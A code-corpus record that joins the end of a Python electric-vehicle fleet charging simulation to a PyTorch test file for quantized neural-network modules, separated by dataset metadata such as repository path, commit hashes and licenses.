# PRIORITY = BATT NEEDED/TIME LEFT IN DEPOT
# CHARGE RATE = (PRIORITY/SUM OF ALL PRIORITIES)*AVAILABLE POWER
def smartCharge_battOverLeavetime(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) >= 1:
# CREATE A LIST FOR CARS AND THEIR LEAVETIMES AND BATT NEEDED
priorityRows = []
# ***** FIND LEAVETIMES AND BATT NEEDED AND APPEND TO A LIST *****
for cars in range(0, len(depot)):
car = depot[cars]
# READ INDEX OF LATEST SHIFT AND INDEX OF THE LAST SHIFT
shiftIndex = carDataDF.loc[car, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(car)])
# IF NEXT SHIFT EXISTS, TAKE START TIME OF NEXT SHIFT
if (shiftIndex + 1) < lastShiftIndex:
nextStart = shiftsByCar[str(car)].loc[shiftIndex+1, 'startShift']
# IF SHIFT INDEX GOES BEYOND LAST SHIFT, TAKE ARBITRARY LEAVETIME
else:
lastStart = shiftsByCar[str(car)].loc[lastShiftIndex-1, 'startShift']
lastDay = readTime(lastStart).date() + dt.timedelta(days=1)
nextStart = readTime(str(lastDay) + " 23:59:59")
# CALCULATE TIME LEFT AND BATT NEEDED
hrsLeft = ((rereadTime(nextStart) - rereadTime(time)).total_seconds())/(60*60)
battLeft = carDataDF.loc[car,'battSize']-carDataDF.loc[car,'battkW']
# LET PRIORITY = BATT LEFT/TIME LEFT, APPEND TO LIST
priorityRows.append([car, battLeft/hrsLeft, battLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT BY PRIORITY *****
leaveTimes = pd.DataFrame.from_records(priorityRows, columns=['car','priority','battLeft'])
leaveTimes = leaveTimes.sort_values(by=['priority'], ascending=False)
leaveTimes = leaveTimes.reset_index(drop=True)
# ***** IN SORTED ORDER, CALCULATE PRIORITY RATIO AND CHARGE *****
# CALCULATE THE SUM OF PRIORITY VALUES
prioritySum = sum(leaveTimes.priority)
# FOR EVERY CAR:
for row in range(0, len(leaveTimes)):
# READ IN DATA FOR SELECTED CAR
car = leaveTimes.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
battLeft = leaveTimes.loc[row, 'battLeft']
priority = leaveTimes.loc[row, 'priority']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE CHARGE RATE USING PRIORITY/SUM OF PRIORITIES
chargeRate = (priority/prioritySum)*availablePower
# IF CHARGE RATE EXCEEDS MAX RATE:
if chargeRate > maxRate: chargeRate = maxRate
# IF CHARGE RATE EXCEEDS CHARGE NEEDED:
if chargeRate > battLeft*chunks: chargeRate = battLeft*chunks
# ADJUST REMAINING AVAILABLE POWER AND PRIORITY SUM
availablePower -= chargeRate
prioritySum -= priority
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
##############################################
# INCREASE BATT DURING CHARGE (COST SENSITIVE)
##############################################
# PRIORITY = BATT NEEDED/TIME LEFT IN DEPOT
# IF CAR WILL CHARGE OVER GREEN ZONE:
# DELAY CHARGING UNTIL START GREEN ZONE STARTS (PRIORITY = 0)
# CHARGE RATE = (PRIORITY/SUM OF ALL PRIORITIES)*AVAILABLE POWER
def costSensitiveCharge(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) >= 1:
# CREATE A LIST FOR CARS AND THEIR LEAVETIME AND BATT NEEDED
priorityRows = []
# ***** CALCULATE PRIORITY FOR EACH CAR AND APPEND TO A LIST *****
for cars in range(0, len(depot)):
carNum = depot[cars]
# READ INDEX OF LATEST SHIFT AND INDEX OF THE LAST SHIFT
shiftIndex = carDataDF.loc[carNum, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(carNum)])
# IF NEXT SHIFT EXISTS, TAKE START TIME OF NEXT SHIFT
if (shiftIndex + 1) < lastShiftIndex:
nextStart = readTime(shiftsByCar[str(carNum)].loc[shiftIndex+1, 'startShift'])
# IF SHIFT INDEX GOES BEYOND LAST SHIFT, TAKE ARBITRARY LEAVETIME
else:
lastStart = shiftsByCar[str(carNum)].loc[lastShiftIndex-1, 'startShift']
lastDay = readTime(lastStart).date() + dt.timedelta(days=1)
nextStart = readTime(str(lastDay) + " 23:59:59")
# CALCULATE TIME LEFT AND BATT NEEDED
hrsLeft = ((rereadTime(nextStart) - rereadTime(time)).total_seconds())/(60*60)
battLeft = carDataDF.loc[carNum,'battSize']-carDataDF.loc[carNum,'battkW']
prior = battLeft/hrsLeft
# ***** DELAY CHARGING FOR CARS THAT ARE IN DEPOT DURING THE GREEN ZONE *****
# READ IN START AND END TIMES OF GREEN ZONE
greenStartHr = pricesDF.loc[pricesDF['company']==company, 'startGreenZone'].to_string(index=False)
greenEndHr = pricesDF.loc[pricesDF['company']==company, 'endGreenZone'].to_string(index=False)
# IF GREEN ZONE RUNS OVERNIGHT:
if (readTime(greenStartHr) > readTime(greenEndHr)):
# GREEN START = CURRENT DAY + GREEN ZONE START TIME
greenStart = readTime(str(time.date()) + " " + greenStartHr)
# GREEN END = NEXT DAY + GREEN END TIME
greenEnd = readTime(str(time.date() + dt.timedelta(days=1)) + " " + greenEndHr)
# IF GREEN ZONE DOESN'T RUN OVERNIGHT, CONSIDER CASE WHERE TIME IS PAST MIDNIGHT
else:
# CALCULATE DIFFERENCE GREEN ZONE START TIME AND MIDNIGHT
arbGreenStart = dt.datetime.combine(dt.date.today(), readTime(greenStartHr))
arbMidnight = dt.datetime.combine(dt.date.today(), readTime("00:00:00"))
gap = arbGreenStart - arbMidnight
# GREEN START = (TIME-GAP) + 1 DAY + GREEN ZONE START TIME
greenStart = readTime(str((time-gap).date() + dt.timedelta(days=1)) + " " + greenStartHr)
# GREEN END = (TIME-GAP) + 1 DAY + GREEN ZONE END TIME
greenEnd = readTime(str((time-gap).date() + dt.timedelta(days=1)) + " " + greenEndHr)
# IF GREEN ZONE HASN'T STARTED YET,
# AND IF CAR WILL BE CHARGING THROUGHOUT WHOLE OF GREEN ZONE:
if (time < greenStart) and (nextStart >= greenEnd):
# DELAY CHARGING UNTIL GREEN ZONE
prior = 0.0
# LET PRIORITY = BATTLEFT/TIME LEFT, APPEND TO LIST
priorityRows.append([carNum, prior, battLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT BY PRIORITY *****
leaveTimes = pd.DataFrame.from_records(priorityRows, columns=['car','priority','battLeft'])
leaveTimes = leaveTimes.sort_values(by=['priority'], ascending=False)
leaveTimes = leaveTimes.reset_index(drop=True)
# ***** IN SORTED ORDER, CALCULATE PRIORITY RATIO AND CHARGE *****
# CALCULATE THE SUM OF PRIORITY VALUES
prioritySum = sum(leaveTimes.priority)
# FOR EVERY CAR:
for row in range(0, len(leaveTimes)):
# READ IN DATA FOR SELECTED CAR
car = leaveTimes.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
battLeft = leaveTimes.loc[row, 'battLeft']
priority = leaveTimes.loc[row, 'priority']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE CHARGE RATE USING PRIORITY/SUM OF PRIORITIES
if prioritySum == 0.0: chargeRate = 0
else: chargeRate = (priority/prioritySum)*availablePower
# IF CHARGE RATE EXCEEDS MAX RATE:
if chargeRate > maxRate: chargeRate = maxRate
# IF CHARGE RATE EXCEEDS CHARGE NEEDED:
if chargeRate > battLeft*chunks: chargeRate = battLeft*chunks
# ADJUST REMAINING AVAILABLE POWER AND PRIORITY SUM
availablePower -= chargeRate
prioritySum -= priority
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
#################################################################################################################################
############################################
# RUN SIMULATION FROM SEPARATE FILE
############################################
def runSimulation(startTime, runTime, RCduration, RCperc,
fleetData, driveDataDF, allShiftsDF, pricesDF, company,
algo):
# INITIALISE MAIN DATAFRAMES WITH DATA AT START TIME
# Get data from csv inputs
carData, chargePtData = getLists(fleetData)
# Choose column names
carCols = ["battkW","inDepot","battSize","chargePt","shiftIndex","latestStartShift","latestEndShift"]
cpCols = ["maxRate","inUse"]
simCols = ["time","car","chargeDiff","batt","event","costPerCharge","totalCost"]
tcCols = ["car","chargeRate"] # Columns for cars that need to charge and the
# rate at which they will charge given by the algorithm
# Initialise dataframes
carDataDF = pd.DataFrame.from_records(carData, columns=carCols)
chargePtDF = pd.DataFrame.from_records(chargePtData, columns=cpCols)
simulationDF = pd.DataFrame(columns=simCols)
# Create rows for every car in toChargeDF
toChargeDFrows = []
for i in range(len(carDataDF)):
toChargeDFrows.append([i, 0])
# Initialise toChargeDF
toChargeDF = pd.DataFrame(toChargeDFrows, columns=tcCols)
# APPEND CARS INTO DEPOT AT START TIME
depot = []
for car in range(0, len(carDataDF)):
if carDataDF.loc[car,'inDepot']: depot.append(car)
# CREATE LIBRARY FOR SHIFTS BY CAR
shiftsByCar = unpackShifts(carDataDF, allShiftsDF)
# CREATE LIBRARY FOR DRIVING DATA
driveDataByCar = {}
for car in range(0, len(carDataDF)):
findData = driveDataDF.loc[driveDataDF['car']==car]
dataNoIndex = findData.reset_index(drop=True)
driveDataByCar['%s' % car] = dataNoIndex
# RETRIEVE AVAILABLE POWER FROM FLEET DATA
availablePower = getData(fleetData, 'availablePower')
rcCount = 0 # INITIALISE A COUNTER FOR RAPID CHARGES
totalCost = 0 # INITIALISE A COUNTER FOR TOTAL COST
time = startTime # CHOOSE START TIME
# RUN SIMULATION FOR ALL OF RUN TIME
for i in range(0, runTime*chunks):
# print("*****" + str(time))
# INITIALISE A VARIABLE TO CHECK FOR EVENT CHANGES
eventChange = False
# *** RUN FUNCTIONS THAT INCLUDE WILL RECOGNISE CHANGES IN EVENTS ***
carDataDF, depot, chargePtDF, toChargeDF, eventChange = inOutDepot(carDataDF, shiftsByCar, time, depot, chargePtDF, toChargeDF, eventChange)
toChargeDF, eventChange = readFullBattCars(carDataDF, simulationDF, toChargeDF, time, totalCost, eventChange)
eventChange = readTariffChanges(time, pricesDF, company, eventChange)
# *** RUN FUNCTIONS AFFECTING CARS OUTSIDE THE DEPOT ***
# DECREASE BATT/RAPID CHARGE CARS OUTSIDE THE DEPOT
carDataDF, rcCount, simulationDF, totalCost = driving(carDataDF, time, rcCount, RCduration, RCperc, simulationDF, driveDataByCar, i, totalCost)
# *** RUN FUNCTIONS AFFECTING CARS IN THE DEPOT ***
# IF THERE IS AN EVENT, RUN CHARGING ALGORITHM
if eventChange == True:
carDataDF, chargePtDF, toChargeDF, totalCost = algo(carDataDF, depot, shiftsByCar, time, availablePower, simulationDF, chargePtDF, toChargeDF, pricesDF, company, totalCost)
# CHARGE/READ WAITING CARS IN THE DEPOT
carDataDF, simulationDF, chargePtDF, totalCost = charge(carDataDF, depot, simulationDF, time, chargePtDF, toChargeDF, pricesDF, company, totalCost)
# FORMAT TOTAL COST COLUMN IN SIMULATION DF
simulationDF = adjustTotalCost(time, simulationDF)
# INCREMENT TIME OF SIMULATION
time = incrementTime(time)
# print("\n")
# print("No. of rapid charges: " + str(rcCount))
# FORMAT FINAL SIMULATION DF FOR VIEWING OR ANIMATION
sim = dfFunction(simulationDF, 'car')
return styleDF(sim), simulationDF # second dataframe, 'sim', is for animation purposes
| [
"[email protected]"
] | |
c1f7f5a8fdcb8e87bf303027ecd2d3053561bdfd | abb64b652cf908aaa17257464a12395b014b6093 | /test/test_quantized_nn_mods.py | 7203fb371c6255be2b47c7441de524a677698d85 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | beifangfazhanlu/pytorch | 8a1c5a4a11b29da26af4d3839aff0ca22e4a298a | b7d992eb46a1e085d2b8b7f0df9817bf569616d3 | refs/heads/master | 2020-07-13T15:43:26.647301 | 2019-08-29T05:18:56 | 2019-08-29T05:20:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,424 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import torch.nn.quantized as nnq
import torch.nn.quantized.dynamic as nnqd
import torch.nn._intrinsic.quantized as nnq_fused
import torch.nn.quantized.functional as qF
from torch.nn.quantized.modules import Conv2d
from torch.nn._intrinsic.quantized import ConvReLU2d
import torch.quantization
from common_utils import run_tests, tempfile
from common_quantization import QuantizationTestCase, no_deadline, prepare_dynamic
from common_quantized import _calculate_dynamic_qparams
from hypothesis import given
from hypothesis import strategies as st
import unittest
'''
Note that tests in this file are just API test, to make sure we wrapped the
quantized operator implementations correctly in the user facing APIs, these are
not correctness test for the underlying quantized operators. For correctness
test please see `caffe2/test/test_quantized.py`.
'''
class FunctionalAPITest(QuantizationTestCase):
def test_relu_api(self):
X = torch.arange(-5, 5, dtype=torch.float)
scale = 2.0
zero_point = 1
qX = torch.quantize_linear(X, scale=scale, zero_point=zero_point, dtype=torch.quint8)
qY = torch.relu(qX)
qY_hat = qF.relu(qX)
self.assertEqual(qY, qY_hat)
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
use_bias=st.booleans(),
)
def test_conv_api(self, use_bias):
"""Tests the correctness of the conv module.
The correctness is defined against the functional implementation.
"""
N, iC, H, W = 10, 10, 10, 3
oC, g, kH, kW = 16, 1, 3, 3
scale, zero_point = 1.0 / 255, 128
stride = (1, 1)
i_padding = (0, 0)
dilation = (1, 1)
X = torch.randn(N, iC, H, W, dtype=torch.float32)
X = X.permute([0, 2, 3, 1]).contiguous()
qX = torch.quantize_linear(X, scale=scale, zero_point=128, dtype=torch.quint8)
w = torch.randn(oC, iC // g, kH, kW, dtype=torch.float32)
qw = torch.quantize_linear(w, scale=scale, zero_point=0, dtype=torch.qint8)
b = torch.randn(oC, dtype=torch.float32) if use_bias else None
q_bias = torch.quantize_linear(b, scale=1.0 / 1024, zero_point=0, dtype=torch.qint32) if use_bias else None
q_filters_ref = torch.ops.quantized.fbgemm_conv_prepack(qw.permute([0, 2, 3, 1]),
stride,
i_padding,
dilation,
g)
requantized_bias = torch.quantize_linear(q_bias.dequantize(), scale * scale, 0 , torch.qint32) if use_bias else None
ref_result = torch.ops.quantized.fbgemm_conv2d(qX.permute([0, 2, 3, 1]), q_filters_ref,
requantized_bias, stride,
i_padding, dilation,
g, scale, zero_point).permute([0, 3, 1, 2])
q_result = torch.nn.quantized.functional.conv2d(qX,
qw,
bias=q_bias, scale=scale,
zero_point=zero_point,
stride=stride, padding=i_padding,
dilation=dilation, groups=g,
dtype=torch.quint8)
self.assertEqual(ref_result, q_result)
class DynamicModuleAPITest(QuantizationTestCase):
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
batch_size=st.integers(1, 5),
in_features=st.integers(16, 32),
out_features=st.integers(4, 8),
use_bias=st.booleans(),
use_default_observer=st.booleans(),
)
def test_linear_api(self, batch_size, in_features, out_features, use_bias, use_default_observer):
"""test API functionality for nn.quantized.dynamic.Linear"""
W = torch.rand(out_features, in_features).float()
W_scale, W_zp = _calculate_dynamic_qparams(W, torch.qint8)
W_q = torch.quantize_linear(W, W_scale, W_zp, torch.qint8)
X = torch.rand(batch_size, in_features).float()
B = torch.rand(out_features).float() if use_bias else None
qlinear = nnqd.Linear(in_features, out_features)
# Run module with default-initialized parameters.
# This tests that the constructor is correct.
qlinear(X)
qlinear.set_weight(W_q)
# Simple round-trip test to ensure weight()/set_weight() API
self.assertEqual(qlinear.weight(), W_q)
W_pack = qlinear._packed_weight
qlinear.bias = B if use_bias else None
Z_dq = qlinear(X)
# Check if the module implementation matches calling the
# ops directly
Z_ref = torch.ops.quantized.fbgemm_linear_dynamic(X, W_pack, B)
self.assertEqual(Z_ref, Z_dq)
# Test serialization of dynamic quantized Linear Module using state_dict
model_dict = qlinear.state_dict()
self.assertEqual(model_dict['weight'], W_q)
if use_bias:
self.assertEqual(model_dict['bias'], B)
with tempfile.TemporaryFile() as f:
torch.save(model_dict, f)
f.seek(0)
loaded_dict = torch.load(f)
for key in model_dict:
self.assertEqual(model_dict[key], loaded_dict[key])
loaded_qlinear = nnqd.Linear(in_features, out_features)
loaded_qlinear.load_state_dict(loaded_dict)
linear_unpack = torch.ops.quantized.fbgemm_linear_unpack
self.assertEqual(linear_unpack(qlinear._packed_weight),
linear_unpack(loaded_qlinear._packed_weight))
if use_bias:
self.assertEqual(qlinear.bias, loaded_qlinear.bias)
self.assertTrue(dir(qlinear) == dir(loaded_qlinear))
self.assertTrue(hasattr(qlinear, '_packed_weight'))
self.assertTrue(hasattr(loaded_qlinear, '_packed_weight'))
self.assertTrue(hasattr(qlinear, 'weight'))
self.assertTrue(hasattr(loaded_qlinear, 'weight'))
self.assertEqual(qlinear.weight(), loaded_qlinear.weight())
self.assertEqual(qlinear.weight(), torch.ops.quantized.fbgemm_linear_unpack(qlinear._packed_weight))
Z_dq2 = qlinear(X)
self.assertEqual(Z_dq, Z_dq2)
# test serialization of module directly
with tempfile.TemporaryFile() as f:
torch.save(qlinear, f)
f.seek(0)
loaded = torch.load(f)
# This check is disabled pending an issue in PyTorch serialization:
# https://github.com/pytorch/pytorch/issues/24045
# self.assertEqual(qlinear.weight(), loaded.weight())
self.assertEqual(qlinear.zero_point, loaded.zero_point)
# Test JIT
self.checkScriptable(qlinear, list(zip([X], [Z_ref])), check_save_load=True)
# Test from_float
float_linear = torch.nn.Linear(in_features, out_features).float()
if use_default_observer:
float_linear.qconfig = torch.quantization.default_dynamic_qconfig
prepare_dynamic(float_linear)
float_linear(X.float())
quantized_float_linear = nnqd.Linear.from_float(float_linear)
# Smoke test to make sure the module actually runs
quantized_float_linear(X)
# Smoke test extra_repr
str(quantized_float_linear)
class ModuleAPITest(QuantizationTestCase):
def test_relu(self):
relu_module = nnq.ReLU()
relu6_module = nnq.ReLU6()
x = torch.arange(-10, 10, dtype=torch.float)
y_ref = torch.relu(x)
y6_ref = torch.nn.modules.ReLU6()(x)
qx = torch.quantize_linear(x, 1.0, 0, dtype=torch.qint32)
qy = relu_module(qx)
qy6 = relu6_module(qx)
self.assertEqual(y_ref, qy.dequantize(),
message="ReLU module API failed")
self.assertEqual(y6_ref, qy6.dequantize(),
message="ReLU6 module API failed")
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
batch_size=st.integers(1, 5),
in_features=st.integers(16, 32),
out_features=st.integers(4, 8),
use_bias=st.booleans(),
use_fused=st.booleans(),
)
def test_linear_api(self, batch_size, in_features, out_features, use_bias, use_fused):
"""test API functionality for nn.quantized.linear and nn._intrinsic.quantized.linear_relu"""
W = torch.rand(out_features, in_features).float()
W_q = torch.quantize_linear(W, 0.1, 4, torch.qint8)
X = torch.rand(batch_size, in_features).float()
X_q = torch.quantize_linear(X, 0.2, 10, torch.quint8)
B = torch.rand(out_features).float() if use_bias else None
B_q = torch.quantize_linear(B, W_q.q_scale() * X_q.q_scale(), 0, torch.qint32) if use_bias else None
scale = 0.5
zero_point = 3
if use_fused:
qlinear = nnq_fused.LinearReLU(in_features, out_features)
else:
qlinear = nnq.Linear(in_features, out_features)
# Run module with default-initialized parameters.
# This tests that the constructor is correct.
qlinear(X_q)
qlinear.set_weight(W_q)
# Simple round-trip test to ensure weight()/set_weight() API
self.assertEqual(qlinear.weight(), W_q)
W_pack = qlinear._packed_weight
qlinear.bias = B_q if use_bias else None
qlinear.scale = float(scale)
qlinear.zero_point = int(zero_point)
Z_q = qlinear(X_q)
# Check if the module implementation matches calling the
# ops directly
if use_fused:
Z_ref = torch.ops.quantized.fbgemm_linear_relu(X_q, W_pack, B_q, scale, zero_point)
else:
Z_ref = torch.ops.quantized.fbgemm_linear(X_q, W_pack, B_q, scale, zero_point)
self.assertEqual(Z_ref, Z_q)
# Test serialization of quantized Linear Module using state_dict
model_dict = qlinear.state_dict()
self.assertEqual(model_dict['weight'], W_q)
if use_bias:
self.assertEqual(model_dict['bias'], B_q)
with tempfile.TemporaryFile() as f:
torch.save(model_dict, f)
f.seek(0)
loaded_dict = torch.load(f)
for key in model_dict:
self.assertEqual(model_dict[key], loaded_dict[key])
if use_fused:
loaded_qlinear = nnq_fused.LinearReLU(in_features, out_features)
else:
loaded_qlinear = nnq.Linear(in_features, out_features)
loaded_qlinear.load_state_dict(loaded_dict)
linear_unpack = torch.ops.quantized.fbgemm_linear_unpack
self.assertEqual(linear_unpack(qlinear._packed_weight),
linear_unpack(loaded_qlinear._packed_weight))
if use_bias:
self.assertEqual(qlinear.bias, loaded_qlinear.bias)
self.assertEqual(qlinear.scale, loaded_qlinear.scale)
self.assertEqual(qlinear.zero_point, loaded_qlinear.zero_point)
self.assertTrue(dir(qlinear) == dir(loaded_qlinear))
self.assertTrue(hasattr(qlinear, '_packed_weight'))
self.assertTrue(hasattr(loaded_qlinear, '_packed_weight'))
self.assertTrue(hasattr(qlinear, 'weight'))
self.assertTrue(hasattr(loaded_qlinear, 'weight'))
self.assertEqual(qlinear.weight(), loaded_qlinear.weight())
self.assertEqual(qlinear.weight(), torch.ops.quantized.fbgemm_linear_unpack(qlinear._packed_weight))
Z_q2 = loaded_qlinear(X_q)
self.assertEqual(Z_q, Z_q2)
# test serialization of module directly
with tempfile.TemporaryFile() as f:
torch.save(qlinear, f)
f.seek(0)
loaded = torch.load(f)
# This check is disabled pending an issue in PyTorch serialization:
# https://github.com/pytorch/pytorch/issues/24045
# self.assertEqual(qlinear.weight(), loaded.weight())
self.assertEqual(qlinear.bias, loaded.bias)
self.assertEqual(qlinear.scale, loaded.scale)
self.assertEqual(qlinear.zero_point, loaded.zero_point)
# Test JIT
self.checkScriptable(qlinear, list(zip([X_q], [Z_ref])), check_save_load=True)
# Test from_float
float_linear = torch.nn.Linear(in_features, out_features).float()
float_linear.qconfig = torch.quantization.default_qconfig
torch.quantization.prepare(float_linear)
float_linear(X.float())
quantized_float_linear = torch.quantization.convert(float_linear)
# Smoke test to make sure the module actually runs
quantized_float_linear(X_q)
# Smoke test extra_repr
str(quantized_float_linear)
def test_quant_dequant_api(self):
r = torch.tensor([[1., -1.], [1., -1.]], dtype=torch.float)
scale, zero_point, dtype = 1.0, 2, torch.qint8
# testing Quantize API
qr = torch.quantize_linear(r, scale, zero_point, dtype)
quant_m = nnq.Quantize(scale, zero_point, dtype)
qr2 = quant_m(r)
self.assertEqual(qr, qr2)
# testing Dequantize API
rqr = qr.dequantize()
dequant_m = nnq.DeQuantize()
rqr2 = dequant_m(qr2)
self.assertEqual(rqr, rqr2)
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
use_bias=st.booleans(),
use_fused=st.booleans(),
)
def test_conv_api(self, use_bias, use_fused):
"""Tests the correctness of the conv module.
The correctness is defined against the functional implementation.
"""
N, iC, H, W = 10, 10, 10, 3
oC, g, kH, kW = 16, 1, 3, 3
scale, zero_point = 1.0 / 255, 128
X = torch.randn(N, iC, H, W, dtype=torch.float32)
X = X.permute([0, 2, 3, 1]).contiguous()
qX = torch.quantize_linear(X, scale=scale, zero_point=128, dtype=torch.quint8)
w = torch.randn(oC, iC // g, kH, kW, dtype=torch.float32)
qw = torch.quantize_linear(w, scale=scale, zero_point=0, dtype=torch.qint8)
b = torch.randn(oC, dtype=torch.float32) if use_bias else None
qb = torch.quantize_linear(b, scale=1.0 / 1024, zero_point=0, dtype=torch.qint32) if use_bias else None
if use_fused:
conv_under_test = ConvReLU2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
else:
conv_under_test = Conv2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
# Run module with default-initialized parameters.
# This tests that the constructor is correct.
conv_under_test(qX)
conv_under_test.set_weight(qw)
conv_under_test.bias = qb
conv_under_test.scale = scale
conv_under_test.zero_point = zero_point
# Test members
self.assertTrue(hasattr(conv_under_test, '_packed_weight'))
self.assertTrue(hasattr(conv_under_test, 'scale'))
self.assertTrue(hasattr(conv_under_test, 'zero_point'))
# Test properties
self.assertEqual(qw, conv_under_test.weight())
self.assertEqual(qb, conv_under_test.bias)
self.assertEqual(scale, conv_under_test.scale)
self.assertEqual(zero_point, conv_under_test.zero_point)
# Test forward
result_under_test = conv_under_test(qX)
result_reference = qF.conv2d(qX, qw, bias=qb,
scale=scale, zero_point=zero_point,
stride=1, padding=0,
dilation=1, groups=g, dtype=torch.quint8
)
if use_fused:
# result_reference < zero_point doesn't work for qtensor yet
# result_reference[result_reference < zero_point] = zero_point
MB, OC, OH, OW = result_reference.size()
for i in range(MB):
for j in range(OC):
for h in range(OH):
for w in range(OW):
if result_reference[i][j][h][w].int_repr() < zero_point:
# assign 0. that gets converted to zero_point
result_reference[i][j][h][w] = 0.
self.assertEqual(result_reference, result_under_test,
message="Tensors are not equal.")
# Test serialization of quantized Conv Module using state_dict
model_dict = conv_under_test.state_dict()
self.assertEqual(model_dict['weight'], qw)
if use_bias:
self.assertEqual(model_dict['bias'], qb)
with tempfile.NamedTemporaryFile() as f:
torch.save(model_dict, f)
f.seek(0)
loaded_dict = torch.load(f)
for key in model_dict:
self.assertEqual(loaded_dict[key], model_dict[key])
if use_fused:
loaded_conv_under_test = ConvReLU2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
else:
loaded_conv_under_test = Conv2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
loaded_conv_under_test.load_state_dict(loaded_dict)
self.assertEqual(loaded_conv_under_test.weight(), conv_under_test.weight())
if use_bias:
self.assertEqual(loaded_conv_under_test.bias, conv_under_test.bias)
self.assertEqual(loaded_conv_under_test.scale, conv_under_test.scale)
self.assertEqual(loaded_conv_under_test.zero_point, conv_under_test.zero_point)
self.assertTrue(dir(loaded_conv_under_test) == dir(conv_under_test))
self.assertTrue(hasattr(conv_under_test, '_packed_weight'))
self.assertTrue(hasattr(loaded_conv_under_test, '_packed_weight'))
self.assertTrue(hasattr(conv_under_test, 'weight'))
self.assertTrue(hasattr(loaded_conv_under_test, 'weight'))
self.assertEqual(loaded_conv_under_test.weight(), conv_under_test.weight())
self.assertEqual(loaded_conv_under_test.weight(), qw)
loaded_result = loaded_conv_under_test(qX)
self.assertEqual(loaded_result, result_reference)
with tempfile.NamedTemporaryFile() as f:
torch.save(conv_under_test, f)
f.seek(0)
loaded_conv = torch.load(f)
self.assertEqual(conv_under_test.bias, loaded_conv.bias)
self.assertEqual(conv_under_test.scale, loaded_conv.scale)
self.assertEqual(conv_under_test.zero_point, loaded_conv.zero_point)
# JIT testing
self.checkScriptable(conv_under_test, list(zip([qX], [result_reference])), check_save_load=True)
# Test from_float
float_conv = torch.nn.Conv2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros').float()
float_conv.qconfig = torch.quantization.default_qconfig
torch.quantization.prepare(float_conv)
float_conv(X.float())
quantized_float_conv = torch.quantization.convert(float_conv)
# Smoke test to make sure the module actually runs
quantized_float_conv(qX)
# Check that bias is quantized based on output scale
if use_bias:
qbias = torch.quantize_linear(float_conv.bias, quantized_float_conv.scale / 2**16, 0, torch.qint32)
self.assertEqual(quantized_float_conv.bias.dequantize(), qbias.dequantize())
# Smoke test extra_repr
str(quantized_float_conv)
def test_pool_api(self):
"""Tests the correctness of the pool module.
The correctness is defined against the functional implementation.
"""
N, C, H, W = 10, 10, 10, 3
kwargs = {
'kernel_size': 2,
'stride': None,
'padding': 0,
'dilation': 1
}
scale, zero_point = 1.0 / 255, 128
X = torch.randn(N, C, H, W, dtype=torch.float32)
qX = torch.quantize_linear(X, scale=scale, zero_point=zero_point,
dtype=torch.quint8)
qX_expect = torch.nn.functional.max_pool2d(qX, **kwargs)
pool_under_test = torch.nn.quantized.MaxPool2d(**kwargs)
qX_hat = pool_under_test(qX)
self.assertEqual(qX_expect, qX_hat)
# JIT Testing
self.checkScriptable(pool_under_test, list(zip([X], [qX_expect])))
if __name__ == '__main__':
run_tests()
| [
"[email protected]"
] | |
